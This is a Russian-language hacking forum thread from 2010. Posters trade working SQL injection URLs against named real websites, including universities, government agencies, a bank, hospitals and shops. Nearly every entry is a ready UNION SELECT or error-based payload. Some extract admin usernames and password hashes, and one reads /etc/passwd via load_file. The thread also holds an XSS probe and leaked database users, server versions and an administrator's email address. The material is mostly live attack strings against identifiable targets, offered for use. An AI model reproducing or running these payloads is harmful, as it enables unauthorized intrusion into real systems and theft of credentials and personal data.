http://www.hbma.org/news/news.php?news_id=-49'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13+--+
socalpoba.org
http://www.socalpoba.org/news.php?news_id=-51'+union+select+1,2,3,4,5,6,7+--+&start=0&category_id=0&parent_id=0&arcyear=&arcmonth=
wicnet.org.uk пр3
http://www.wicnet.org.uk/event_detail.php?ev_id=-80+union+select+1,2,3,4,5,6,7,8,9,10+--+
ccinw.com пр5
http://www.ccinw.com/sites/bpc_pages.html?site_id=1&event_id=-567'+union+select+1,2,3,4,5,user_id,7,8,9,10,11,12 ,13,14,15+from+users+--+
drlaura.com пр4 тиц20
http://www.drlaura.com/reading/index.html?mode=view&id=-459+union+select+1,2,3,4,5,6,7,8+/*+
opal67.org пр3
http://www.opal67.org/news.php?news_id=-62+union+select+1,2,3,4,5,6+--+
cpae.gov.co пр4
http://www.cpae.gov.co/index.php?id=-148'+union+select+1+--+
enricoscala.com
http://www.enricoscala.com/work/module/catalogue/view_catalogue.php?select_catalogue=485+union+sele ct+1,2,3,4,5,6,7,concat_ws(0x3a3a,username,PASSWOR D,ADMIN_TYPE_ID),9,10,11,12,13,14,15,16,17,18,19,2 0,21,22,23,24+from+k26_USER+--+&height=300&work_url=916f751c40
new.vawnet.org пр5 тиц20
http://new.vawnet.org/category/index_pages.php?category_id=-748+union+select+Unhex(HEx(user())),2,3+--+
designfront.org пр4 тиц50
http://www.designfront.org/news-single.php?id=61&product=-137+union+select+1,2,3,4,5,6,7,concat_ws(0x3a3a,22 ,user_login,user_pass),9+from+wp_users+--+
loscerros.edu.co пр4 тиц10
http://www.loscerros.edu.co/imprime.php?print=-4+union+select+1,2,3,4+--+&menu=menusup&idioma=Eng
pedagogica.edu.co пр6 тиц10
http://www.pedagogica.edu.co/portal/contenido.php?esquema=-95+uNIOn+sELEct+1,2,3,4,5+--+
humanidades.pedagogica.edu.co
http://humanidades.pedagogica.edu.co/vercontenido.php?id=-8508+union+select+1,2,3,4,5,6,7 ,8,9+--+
aplicalo.com
http://aplicalo.com/productos2.php?id_categoria=-2+uNIon+sELEct+1,2,3,concat_ws(0x3a3a,us uario,contrasena,tipousuario),5,6,7,8,9+from+clave s+limit+3,3+--+&nombre_categoria=DIS.WE B
miratelecomunicacions.com пр3
http://www.miratelecomunicacions.com/web/vercontenido.php?id=-0000000033+union+select+1,2,3,4,5,6,7,8+--+
engancha2finandina.com пр1
http://www.engancha2finandina.com/vercontenido.php?id=-4+union+select+1,concat_Ws(0x3a3a, usuario,clave),3+from+usuarios+--+
redreligionesafroamericanas.org пр4
http://www.redreligionesafroamericanas.org/files_list.php?type=2+union+select+1,username, pass,4+from+user+--+
fundacionscholacantorum.com пр3
http://www.fundacionscholacantorum.com/vernews.php?data=viewnews&id=-180+union+select+1,2 ,3,4,5,6,7,8,9+--+
mutual-learning.eu пр5
http://www.mutual-learning.eu/display_meas_comm.php?id_m=-20+union+select+1,2,3,concat_ws (0x3a3a,id_auth_user,login,pwd,email,name),5+from+ ea_auth_user+--+&lang=en
ciencias.uniandes.edu.co пр6 тиц10
http://ciencias.uniandes.edu.co/interno.php?Id=5&Menu=-36+union+select+1,2,3,concat_ws(0x 3a3a,id_tipo_usuario,nombre,nseg,nsegver),5,6,7,8, 9,10,11+from+tipo_usuario+--+&Lang=es
socioeconomia.univalle.edu.co пр5
http://socioeconomia.univalle.edu.co/nuevo/public/index.php?seccion=DOCUMENTOS&carpeta=-3 09+union+select+1,2,3,4+--+
observatorio.cnice.mec.es пр7
http://observatorio.cnice.mec.es/modules.php?op=modload&name=News&file=index&catid=&topic =-17+union+select+1,2,3+--+
quadernsdigitals.net пр4 тиц10
http://www.quadernsdigitals.net/index.php?accionMenu=noticias.VisualizaNoticiaIU.v isualiz a¬icia_id=-1414+union+select+1,concat_ws(0x3a3a,autId,autNomb re,autApellidos,autUrl),3 ,4,5,6,7,8,9,10,11,12,13+from+Autor+--+
abennacional.org.br пр6
http://www.abennacional.org.br/index.php?path=-30+union+select+1,concat_ws(0x3a3a,id,name ,username,email,password,usertype)+from+aben_users +--+
apdobanespa.com
http://apdobanespa.com/cgotas_dic_saude.php?id=-6841+union+select+1,2,3,4,5,6,7,8,9,10+--+
feisa.com.co пр2
http://www.feisa.com.co/sitio/noticias.php?id=-875+union+select+1,version(),3,4,5,6,7,8,9 ,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+--+
ued.uniandes.edu.co пр5
http://ued.uniandes.edu.co/index.php?id=-0+union+select+1,uid,3,4,5,6,7+from+usuario+--+&login=in
dentalcolombia.com.co пр1
http://www.dentalcolombia.com.co/noticias.php?id=-4+union+select+1,version(),3,4,5,6,7,8, 9,10,11+--+
techstore.com.co пр1
http://www.techstore.com.co/scripts/noticias.php?id=-2+union+select+1,2,3,4,5+--+
e-sanitas.edu.co пр5
http://e-sanitas.edu.co/Unisanitas/noticias.php?id=9+union+select+1,2,3,4,5,concat_ws (0x3 a3a,usuario,clave,Nombre,email),7,8,9+from+usuario s+limit+1,1+--+
utp.edu.co пр7 тиц10
http://www.utp.edu.co/internacional/noticias.php?id=-208+union+select+1,2,3,4,5,6,7,8,9+f rom+information_schema.tables+--+
sitrajur.org.ar пр2
http://www.sitrajur.org.ar/dinamicas/vercontenido.php?id=25+union+select+1,2,3,4,5,6,7, 8, 9,10,11,12+from+usuarios+--+
miratelecomunicacions.com пр3
http://www.miratelecomunicacions.com/web/vercontenido.php?id=-0000000033+union+select+1,2 ,3,4,5,6,7,8+--+
canticummeru.com
http://www.canticummeru.com/en/?mod=seccion&idseccion=-9+union+select+1,2,concat_Ws(0x3a3 a,idadmin,usuario,password,email,activo,nivel),4,5 ,6+from+admin+--+
mirmika.ru пр1 тиц10
http://www.mirmika.ru/index.php?pid=forum&id=-778+union+select+1,2,3,4,5,6,unhex(hex(usER _LOgin))+from+users+--+
iballester.esc.edu.ar пр4
http://www.iballester.esc.edu.ar/sp_novedades_detalle.php?id=inicio&news_id=-190+union+se lect+1,2,3,4,5,6,7,concat_ws(0x3a3a,id,username,pa ssword),9,10,11,12,13+from+back_users+l imit+2,1+--+
lamroth.org пр4 тиц10
http://www.lamroth.org/noticias.php?nota_id=-136+union+select+1,2,3,4,5,6+--+
avesargentinas.org.ar пр5 тиц10
http://www.avesargentinas.org.ar/cs/noticia.php?codigo=-227'+union+select+1,2,id_admin,4, 5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,2 3,24,25+from+admin+--+
ricyt.org.elserver.com пр7
http://ricyt.org.elserver.com/interior/interior.asp?Nivel1=3+union+select+1,2,3,4,5,6+/*+ &Nivel2=1&Idioma=#77
mdpaquarium.com.ar пр6 тиц10
http://www.mdpaquarium.com.ar/noticias.php?id=-42+union+select+1,2,3,4,concat_ws(0x3a3a,i d,email,nombre,apellido,dni,ciudad,pais,cp,opinion ,ndia,nmes,nano,vdia,vmes,vano,visitas, privacidad),6,7,8+from+registro+--+
juegosbolivarianos2005.gov.co
http://www.juegosbolivarianos2005.gov.co/home/news.aspx?Cat=3&NewsId=-301+union+select+1, 2,login,4,5,6,7,8,9,10,11+from+usuarios+--+
fuac.edu.co пр6 тиц10
http://www.fuac.edu.co/modules.php?name=News&file=article&sid=-526+uNIoN+sELecT+1,2,3,4,5 ,6,7,8,9,10,11,12,13,14+from+information_schema.co lumns+--+
jccconta.gov.co пр5
http://www.jccconta.gov.co/consejot/consejotpub.php?tipodoc=0&ano=-2004+union+select+1,2, 3,4,5,6,7+--+
endocrino.org.co пр3
http://endocrino.org.co/index.php?id=1&com=static_content&view=content&news=-1+union+sele ct+1,2,3,4,5,6,7,8+--+
coomeb.upbbga.edu.co пр5
http://coomeb.upbbga.edu.co/news/download.php?id=-99+union+select+1,2,3,concat_ws(0x3a3a, t_id,t_nombre,t_dependencia,t_direccion,t_telcasa, t_movil,t_correo,n_activo)+from+asociad o+limit+2,1+--+
disan.policia.gov.co пр3
http://disan.policia.gov.co/index.php?option=news&id=-56+union+select+1,2,3,4,5,6,7,8,9,1 0,11,12,13+--+
wnsf.org пр5
http://www.wnsf.org/index.php?com=static_content&view=Content&do=view&id=-244+union+selec t+1,2,3,version(),5+from+information_schema.tables +--+
nettingsolutions.com пр3
http://www.nettingsolutions.com/colombia/index.php?com=static_content&view=Content&do=vie w&id=-222+union+select+1,2,3,4,5,6,7,8,9,10+--+&fmi=45'&fmi2=48'
unicauca.edu.co пр6 тиц20
http://www.unicauca.edu.co/noticias.php?idn=-3067+union+select+1,2,3,4,concat_ws(0x3a3a,u ser_id,username,userpass,session,last_visit),6,7,8 ,9,10,11,12,13,14,15+from+poll_user+--+
energysaver.com.ar пр2
http://www.energysaver.com.ar/home/noticia.php?noticia_id=-8+union+select+1,2,3,4,unhex(h ex(uSer()))+--+
colombianosenelexterior.com пр4 тиц10
http://www.colombianosenelexterior.com/index.php?idcategoria=20+union+select+1,2,3,4,conc at_ws(0x3a3a,idusuario,username,password,email),6, 7,8,9,10,11,12,13,14,15,16,17,18,19,20, 21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37 ,38,39,40,41,42,43,44,45+from+modelo_us uario+--+&ts=058e2a969d8259e3531bc8c543f2cea0&PHPSESSID=c8739cff2eae860a77dc538bb2e291be
techinktrainingcenter.com
http://www.techinktrainingcenter.com/digitalmarketingcrm/spanish/index.php?com=static_con tent&view=Content&do=view&id=-235+union+select+1,2,3,4,5,6,7,8,9,10+--+&fmi=77'
biblioteca.cinematecadistrital.gov.co
http://biblioteca.cinematecadistrital.gov.co/opac_css/index.php?lvl=author_see&id=-314+un ion+select+1,2,3,4,5,6,7,8,9+--+
portalingua.info пр6 тиц10
http://www.portalingua.info/fr/agenda/agenda/1/index.php?pays=&theme=-35+union+select+1,2 ,3,4,5,6,7,table_name+from+information_schema.tabl es+/*+
hospitalitatlourdestarragona.org
http://www.hospitalitatlourdestarragona.org/index.php?inc=actualitat&idNoticia=31+union+s elect+1,2,3,4,5,6,7,8,9+--+&idioma=cas
paresiaubia.com пр1
http://paresiaubia.com/taulell_detall.php?id=-36+union+select+1,2,3,4,5,6,7,8,9,10,11,12, 13,14,15,16,17+--+
PS баянов НЕТ, всё проверил!
http://infocyt.conicyt.cl/info.php?id=-1%20UNION%20SELECT%20concat_ws%280x3a,User%28%29,d atabase%28%29,version%28%29%29,2,3,4,5,6%20--+
User: adm_infocyt@localhost
Database: infocyt
Version: 4.1.20
http://www.artvin.gov.tr/index.php?page=haber&file=detay&id=-1+union+select+1,2,concat_ws%280x3a,user%28%29,dat abase%28%29,version%28%29%29,4,5,6%20--+
PR: 6
User: ArtvinBIMUSR@localhost
Database: vtArtvinBIM
Version: 4.0.24_Debian-10sarge2-log
http://www.palestra.pucp.edu.pe/index.php?id=-48+UNION%20SELECT%201,concat_ws(0x3a%20,user(),dat abase(),version()),3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17--
User: paldb@localhost
Version: 5.0.77
Database: palestra
http://www.mpl.mpg.de/mpf/php/abteilung3/cms/_rubric/detail.php?nr=11+or+(select+count(*)+from+(select+ 1+union+select+2+union+select+3)x+group+by+concat( version(),floor(rand(0)*2)))--&rubric=Publications
Database:cms_div3
Version: 5.0.26
User: cmsdiv3@localhost
//
cpo4_users:
id,user,email,admin,passwd
http://apps.facebook.com/csg_jobs/results.php?id=-1+UNION+SELECT+1,concat_ws%280x3a,user%28%29,versi on%28%29,database%28%29%29,3,4,5,6,7,8,9,10--
страшно :D имхо ;)
http://www.compass.auckland.ac.nz/pages/viewpage.php?id=-28+UNION%20SELECT%201,2,3,concat_ws(0x3a%20,user() ,database(),version()),5,6,7+from+Member
User: twes011@nzssds.org
Version: 5.0.45
Database: compass
Google PR: 6
Assembler
08.04.2010, 14:22
УКРАИНСКИЙ ГАЗПРОМ БАНК
http://www.ugpb.com/index.php?cmd=page&pid=1-1%20union%20select%201,2,3,4,5,6,7,8,9,10%20--
Version: 4.1.9-standard-log
Db name: ugpb2
User name: www_user@localhost
ТИЦ: 325
http://www.law.cf.ac.uk/newsandevents/news_display.php?id=736+and+1=0+union+select+1,2,3 ,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,2 2,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38, 39,40--
user() : news@localhost
version() : 5.0.77-log
database() : news
http://rekicen.ru/php/content.php?group=1&id=-596+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 ,32,33,34,35,36,37--
Version () 5.0.26
DB name () gastroport_rekic@localhost
User () gastroport_rekic
http://www.dacc.cc.il.us/news/index.php?id=-495+UNION%20SELECT%201,2,concat_ws(0x3a%20,user(), database(),version()),4,5,6,7,8,9--
User: public@localhost
Version: 4.1.21-standard
Database: news
Google PR: 6
[Feldmarschall]
09.04.2010, 01:25
http://www.yaguza.com/category/category.php?categoryID=99 union all select 1,2,concat(0x3a3a3a,user(),0x3a3a3a,version(),0x3a 3a3a,database()),4,5,6,7,8,9,10--
User: yaguza_test@localhost
VERSION: 5.1.30
DATABASE: yaguza_test
http://www.diadvisor.eu/public/release_display.php?id=-1+UNION%20SELECT%201,2,concat_ws(0x3a%20,user(),da tabase(),version()),4,5
User: advisor_editor@evoked.evokedset.net
Version: 4.1.22-standard
Database: advisor_external
Google PR: 5
http://www.mybrcc.edu/directory/email.php?id=-65+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5--&datacheck=email
User () web_user@www.brcc.cc.la.us
Version () 5.0.27
Database () webdb
http://www.mc.edu/news/event.php?id=-233+UNION+SELECT+1,2,concat_ws%280x3a,user%28%29,v ersion%28%29,database%28%29%29,4,5,6,7--
User () prnews@www.mc.edu
Version () 5.0.86
Database () prnews
http://www.ns.com.co/tienda/iindex.php?id_sec=-1+UNION%20SELECT%201,concat_ws(0x3a%20,user(),data base(),version()),3,4,5,6
User: usu2195_nscom@localhost
Version: 5.0.89-community
Database: usu2195_nscomc
http://www.orghim.ru/meat/news/?id=-1493+union+select+1,2,concat_ws(0x3a,version(),dat abase(),useR(),@@version_compile_os),4,5,6+--+
Database Version: 4.0.27-max-log
Database name: orghim
User name: orghim@v46.valuehost.ru
Os : FreeBSD 4.7
http://www.hxjiqi.cn/articlelist.php?id=-41+UNION%20SELECT%20concat_ws(0x3a%20,user(),datab ase(),version()),2,3--
User: zs62v1@121.198.248.100
Version: 5.0.77-log
Database: zs62v1_db
http://www.metalindex.ru/news/2007/06/14/news_1496.html?template=-23+UNION+SELECT+1,2,3,4,5,6,concat_ws(0x3a,version (),database(),user(),@@version_compile_os),8
Database Version: 4.1.22
Database name: hotmetal
User name: root@localhost
Os : linux
http://www.metalindex.ru/news/2007/06/14/news_1496.html?template=-23+UNION+SELECT+1,2,3,4,5,6,load_file(0x2f6574632f 706173737764),8
http://www.columbiamovers.com.cy/article.php?id=-46+UNION%20SELECT%20concat_ws(0x3a%20,user(),datab ase(),version())--
User: columbiamovers@localhost
Version: 5.0.51a-3ubuntu5.4 9
Database: columbiamovers
[Feldmarschall]
09.04.2010, 18:21
http://www.startparadies.de/webkat.php?mode=showk&id=-18%27+union+select+1,version%28%29,3,4,5--+
VERSION: 4.1.22-standard-log
Жителям Кузбасса посвящается
http://gis42.ru/news/?ref=1&tnews=-180+union+select+1,2,3,4,group_concat(column_name) ,6,7,8+from+information_schema.columns+where+table _name=0x5f6769735f7573657273--
Ветка пятая
http://www.antheahotelapartments.com.cy/article.php?id=-69+UNION%20SELECT%20concat_ws(0x3a%20,user(),datab ase(),version()),2
User: anthea@localhost
Version: 5.0.51a-3ubuntu5.4
Database: anthea
http://www.bilyardia.ru/news.read.phtml?news=-1496+union+select+1,2,3,4,concat_ws(0x3a,version() ,database(),user(),@@version_compile_os),6,7
Database Version: 4.0.27-max-log
Database name: zeusspb9_shop
User name: zeusspb9_shop@v12.valuehost.ru
Os :freebsd4.7
http://www.compassmessen.de/vis_messe.php?id=-1+UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,conc at_ws(0x3a%20,user(),database(),version()),14,15,1 6,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32, 33,34,35,36,37,38
User: compassmes@80.160.71.25
Version: 5.0.67-log
Database: compassmesser_dk_db
CyberHunter
09.04.2010, 18:55
Эта была, но в другом месте.
http://www.elportal.ru/showcomp.php?id=-143+union+select+1+--+
Version: 4.1.25-log
User: irweb@localhost
Database: wwwirwebru
http://www.mostiko.be/index.php?page=artist&view=-57+union+select+1,2,3,4--
user() : mostiko@localhost
version() : 4.0.24_Debian-10
database) : mostiko
:p
http://www.danvideo.es/producto.php?d=-767&id_cat=-115+UNION%20SELECT%201,2,3,4,5,6,7,8,concat_ws(0x3 a%20,user(),database(),version())
User: Dvideo@hs-817.dedicated.hostalia.com
Version: 5.0.54
Database: dvideo
[Feldmarschall]
09.04.2010, 19:29
Игровой Battlefield 2 Сервер [RUS] DIESEL
http://lubernet.su/bfstats/?pid=119402381+or%281,1%29=%28select+count%280%29, concat%28%28select+concat%280x3a3a,version%28%29,0 x3a3a,user%28%29,0x3a3a,database%28%29,0x3a3a%29+f rom+information_schema.tables+limit+0,1%29,floor%2 8rand%280%29*2%29%29from%28information_schema.tabl es%29group+by+2%29/*
VERSION: 5.0.261
USER: bfstats@192.168.2.21
DATABASE: bfstats1
И -
http://lubernet.su/bfstats/?pid=119402381%22%3E%3Cscript%3Ealert%28507168%29% 3C/script%3E
Также Игровой Сервер CS,BF2 и т.д VBIOS
http://stat.vbios.com/bf2/?pid=129375869+or%281,1%29=%28select+count%280%29, concat%28%28select+concat%280x3a3a,version%28%29,0 x3a3a,user%28%29,0x3a3a,database%28%29,0x3a3a%29+f rom+information_schema.tables+limit+0,1%29,floor%2 8rand%280%29*2%29%29from%28information_schema.tabl es%29group+by+2%29/*
Version: 5.0.37-standard-log
USER: bf2statslogger@localhost
Database: bf2stats
http://www.cqgrd.gatech.edu/story.php?id=-1166+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,3 1,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47, 48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64 ,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,8 1,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96--
User: dbread@metro.gatech.edu
Version: 5.0.77
Database: dynabot2
Google PR:5
http://widestream.sourceforge.net/blog.php?c=-22+UNION+SELECT+1,2,3,4,5,6,7--
User: w231599admin@172.29.30.52
Version: 5.0.51a
Database: w231599_widestream
http://supervegan.com/blog/archive.php?a=16+UNION+SELECT+1,2,3,4,5,6--
User: superveg_vegan@localhost
Version: 5.0.90
Database: superveg_vegan
Google PR:6
http://press.georgetown.edu/p.php?id=4+UNION+SELECT+1,2,3,4,5,6,7,8,9--
User: gupadmin@localhost
Version: 4.1.22
Database: georgetown
Google PR:6
http://www.sonymusic.co.id/album81.php?id=-867+UNION%20SELECT%201,2,3,concat_ws(0x3a%20,user( ),database(),version()),5,6,7,8,9,10,11,12--
User: t58925_sm@localhost
Version: t58925_sonymusic
Database: 5.0.51a-24+lenny3
Видимо используется какой-то префикс, подобрать названия таблиц/найти админку не смог(
http://www.smithy.com/products.php?cid=-1%20union%20select%201,2,3,version(),5,6,7,8,9,10, 11,12%20limit%200,1%20--
version: 4.1.22
user: cart@localhost
database: shoppingcart
http://www.job-mariel.ru/rabota.php?lev=1&id=480000000000+UNION+SELECT+1,2,3,concat_ws(0x3a% 20,user(),database(),version())--
User: firebull_job@localhost
Version: 5.0.90-community
Database: firebull_job
http://math.arizona.edu/weeklynews/poster.html?id=-5806')+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13, concat_ws(0x3a,user(),version(),database()),15,16, 17,18,19,20,21,22,23,24+--+
User: weeklynews@localhost
Use passwd: No
Version: 5.0.51a-24+lenny3-log
Database: events
http://www.creativetalentnetwork.com/resume.php?id=2290000000+UNION+SELECT+1,2,3,4,5,6, 7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 ,25,26,27,28,concat_ws(0x3a%20,user(),database(),v ersion()),30,31,32,33,34,35,36,37,38,39,40,41,42,4 3,44,45,46,47,48,49,50,51,52,53--
User: dbo132417652@74.208.16.116
Version: 4.0.27-max-log
Database: db132417652
http://rosenwald.fisk.edu/index.php?module=search.details&set_v=aWQ9LTk5IHVuaW9uIHNlbGVjdCANCjEsMiwzLDQsNSw2 LHVuaGV4KGhleChjb25jYXRfd3MoMHgzYSx2ZXJzaW9uKCksZG F0YWJhc2UoKSx1c2VyKCkpKSksOCw5LDEwLDExLDEyLDEzLDE0 LDE1LDE2LDE3LDE4LDE5LDIwLDIxLDIyLDIzLDI0LDI1LDI2LD I3LDI4Lyo=&o=2690
5.0.16-nt:rosenwald:rosenwald@localhost
пасс админский захеширован бинарным способом я так понял.
Pashkela
10.04.2010, 20:16
http://astro.krutomer.ru/daily/common/4&&substring(version(),1,1)=5
есть phpbb-форум
http://www.torg.spb.ru/modul.php?idm=44100000000+UNION+SELECT+1,concat_ws (0x3a%20,user(),database(),version()),3,4--
User: delinform@localhost
Version: 4.0.27-log
Database: delinform
Google PR: 4
DeepBlue7
11.04.2010, 00:37
http://modules.t-o-m-e.net/module.php?id=-999+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a, %20version(),user(),database()),11,12,13
User : darkgod@localhost
Database : darkdb
Version : 5.0.87
http://www.muziekcentrum.be/news.php?ID=-2177+union+select+1,2,3,4,5,6,7,8,9,10--
user() : usrmcv@localhost
version() : 5.1.43-0.dotdeb.0
database() : fmcr
OS : Debian
есть таблица "doc_users"
http://www.muziekcentrum.be/doc/
-----------------------------------------------------
http://www.ethical-perspectives.be/page.php?LAN=E&FILE=ep_detail&ID=91&TID=-470+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16--
user() : oce@tobias.cc.kuleuven.ac.be
version() : 4.1.21-log
database() : oce
OS: Linux
----------------------------------------------------------
http://www.fytobell.be/newsitem_show.php?item=-120+union+select+1,2,3,4,5,6,7,8,9,10
user() : hy_fytows@localhost
version() : 4.1.22-community-nt
database() : db_fytows
OS: Windows
[Feldmarschall]
11.04.2010, 04:39
http://gamekey24.de/sites/site.php?site=products&cat=24+AND+substring%28version%28%29,1,1%29=3
3'тя версия MySQL.. картон тоже есть..
http://www.tstn.ru/news.htm?id=-14521+union+select+1,2,3,4,concat_ws(0x3a,version( ),user(),database(),@@version_compile_os),6,7,8,9, 10,11,12,13,14,15,16,17,18,19,20,21--
version:4.0.26
user:dmitry@localhost
database:abc
os : portbld-freebsd5.4
http://www.dreyblatt.de/html/resume.php?id=7100000000+UNION+SELECT+1,2,concat_w s(0x3a%20,user(),database(),version()),4,5--
User: d005b4d7@85.13.138.76
Version: 4.1.22-max-log
Database: d005b4d7
Google PR: 5
http://www.astrotime.ru/press.php?cid=-2+and+1=2+union+all+select+concat_ws(0x3a,version( ),user(),database(),@@version_compile_os)--
version:5.0.67-log
user:u55884@10.10.10.208
database:u55884
os : unknown-freebsd6.2
spherics
11.04.2010, 14:03
Жесткие парни наладили поставки просто везде но как какого товара нету -)
http://siax.ru/index.php?product_slug=-msi-k9n-neo-f-v2-socket-am2-nforce-520-4ddr2-pci-e-sata-raid-ac97-8ch-giglan-atx&productID=3521 OR productID=IF(ASCII(SUBSTRING((SELECT USER()),1,1))>=107,1,(SELECT 1 UNION SELECT 2))--&ukey=discuss_product =k
http://siax.ru/index.php?product_slug=-msi-k9n-neo-f-v2-socket-am2-nforce-520-4ddr2-pci-e-sata-raid-ac97-8ch-giglan-atx&productID=3521 OR productID=IF(ASCII(SUBSTRING((SELECT USER()),2,1))>=97,1,(SELECT 1 UNION SELECT 2))--&ukey=discuss_product =a
И все остальные по этой же структуре.
http://technobutik.ru
http://electro-mir.ru
http://technocontinent.ru
http://fotobuy.ru
http://digital-box.ru
http://siax.ru
http://mgs-group.ru
http://icomputers.ru
http://mcpc.ru
http://ebuyers.ru
Не попадайтесь -)
Сори если не в тему.
http://www.osf.ro/ro/program.php?program=-10+union+select+1,2,3,4,5,6
user() : site2007@localhost
version() : 5.0.51a-3ubuntu5.5
database() : site2007
OS : Humanity to others
http://www.istyle.ro/i_category.php?id=-9471+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13+fr om+mysql.user
user() : sqladmin@ns.macgallery.ro
version() : 4.1.22-log
database() : sql_applestore_mg
OS : apple-darwin8.0
http://www.profit-travel.ru/news.php?news_id=14000000+UNION+SELECT+1,concat_ws (0x3a%20,user(),database(),version()),3,4--
User: profit_mysql@10.1.31.75
Version: profit_db
Database: 4.1.22-log
shell_c0de
11.04.2010, 19:24
http://www.traffictechnologytoday.com/news.php?NewsID=3+UNION+SELECT+1,2,3,concat_ws(0x3 a,admin,admin_pw,admin_fullname,admin_email),5,6,7 ,8,9,10+from+passenger_ads.phpads_config--
Database Version: 5.0.45-log
Database name: passenger
User name: passenger01@192.168.157.148
admin:admin_pw:admin_fullname:admin_email:
pa553ng02:Hash:UKIP Administrator:a.roylance@ukintpress.com:
http://www.atheism.ru/science/science.phtml?id=865+and+1=2+UNION+SELECT+1,concat _ws(0x3a%20,user(),database(),version()),3,4,5,6,7 ,8,9--
User: muxa@localhost
Version: 5.0.90-log
Database: muxa_ru
http://olimpiada.ru/sectionpub.php?page=-1 union select 'date','data',CONCAT_WS('$',user(),database(),vers ion())
User: olymp@localhost
Database: olymp
Version: 4.1.14
http://intravel.ru/hotel.php?idotel=103935156219689000+UNION+SELECT+1 ,2,concat_ws(0x3a%20,user(),database(),version()), 4,5,6,7,8,9,10,11,12--
User: m13727@fhe2.hoster.ru
Version: 4.0.27-log
Database: db13727m
..::TROYAN::..
11.04.2010, 23:16
http://www.reclaimlutheranworship.org/store/index.php?option=com_education_classes&task=showEvents&id=11/**/AND/**/1=2/**/UNION/**/SELECT/**/1,concat_ws%280x3a,username,password%29,3,4,5,6,7, 8,9,10,11,12,13,14,15,16,17,18+from+jos_users--
http://www.stanthonyhospital.org/index.php?option=com_education_classes&task=showEvents&id=11/**/AND/**/1=2/**/UNION/**/SELECT/**/1,concat_ws%280x3a,username,password%29,3,4,5,6,7, 8,9,10,11,12,13,14,15,16,17,18+from+jos_users--
DeepBlue7
12.04.2010, 02:30
http://bgicrew.com/resume.php?id=-999+union+select+1,concat_ws(0x3a,user(),database( ),version()),3,4
http://www.pbworld.co.uk/index.php?doc=7&aid=-33+union+select+1,concat_ws(0x3a%20,user(),databas e(),version()),3,4,5,6/*
User: parsons@localhost
Version: 5.0.45-community-nt-log
Database: parsonsbrinckerhoff_new
Google PR: 5
http://www.ashmolean.org//exhibitions/events/index.php?id=-33+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26,27,28--
User: ashuser@localhost
Version: 5.0.26-Max
Database: ashmolean
Google PR: 7
http://mindviz.com/gift.php?id=-717+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17--
User: root@localhost
Version: 5.0.41-community
Database: mindviz
Google PR: 4
http://moto25.ru/news.php?newsnomber=-30+union+select+1,2,concat_ws(0x3a%20,user(),datab ase(),version()),version()+from+news/*
User: moto25_moto25@localhost
Version: 5.0.22
Database: moto25_main
http://musiclife.ru/mp3.php?genre='+union+select+1,concat_ws(0x3a%20,u ser(),database(),version())+from+users/*
User: mlusermain@localhost
Version: 5.0.45
Database: MusicLife_main
http://www.realtyfunds.ru/?prevID=3&partID=-22/**/UNION/**/SELECT/**/1,aes_decrypt(aes_encrypt(concat_ws(0x3a,version() ,user(),database(),@@version_compile_os),0x71),0x7 1),3,4,5,6,7--&pageID=323
version:5.0.67-log
user:u8067@10.10.10.222
database:u8067_solovejka
os : unknown-freebsd6.2
http://elpages.ru/about.php?id=-121+union+select+concat_ws(0x3a%20,user(),database (),version())--
User: logansru_elp@localhost
Version: 5.0.90-community-log
Database: logansru_elpages
http://www.gazelkin.ru/index.php?page=-1+union+select+1,2,3,4,5,CONCAT_WS(CHAR(32,58,32), user(),database(),version()),7,8,9+--+
User: h_gazelkin_ru@localhost
Database: gazelkin_ru
Version: 5.0.90-debug-log
http://anticrysis.imperiaforum.ru/page.php?id=1'+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23,concat_ws(0x 3a,version(),database(),user(),@@version_compile_o s),25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40 ,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,5 7,58,59,60,61,62,63,64,65,66,67,68,69,70+LIMIT+1,1--%20+
5.0.88:imperia2:imperia2@localhost:unknown-freebsd7.1
[Feldmarschall]
13.04.2010, 01:24
http://www.piringsdorf.at/?content=1&group=519+and+substring%28version%28%29,1,1%29=3
Version: 3.22.32
Database: keinporto2
User: keinporto@localhost
http://kniga-market.kiev.ua/about.php?id=121&crm=1&tmp=-41+union+select+concat_ws(0x3a%20,user(),database( ),version())--
User: u_knigamarke@localhost
Version: 4.1.22-log
Database: knigamarket
http://www.josleys.com/article_show.php?id=-82+UNION+SELECT+1,2,3,4,5,6,7--
User: jl1_josleys@localhost
Version: 5.0.37-standard
Database: jl1_josleys
Google PR: 6
http://www.shlifwerst.com.ua/catalog.php?slang=0&id_catalog=9+UNION+SELECT+1,2,concat_Ws(0x3a,versi on(),database(),user(),@@version_compile_os),4,5,6 ,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,2 4,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40, 41,42,43,44,45,46
Database Version: 4.0.25-standard
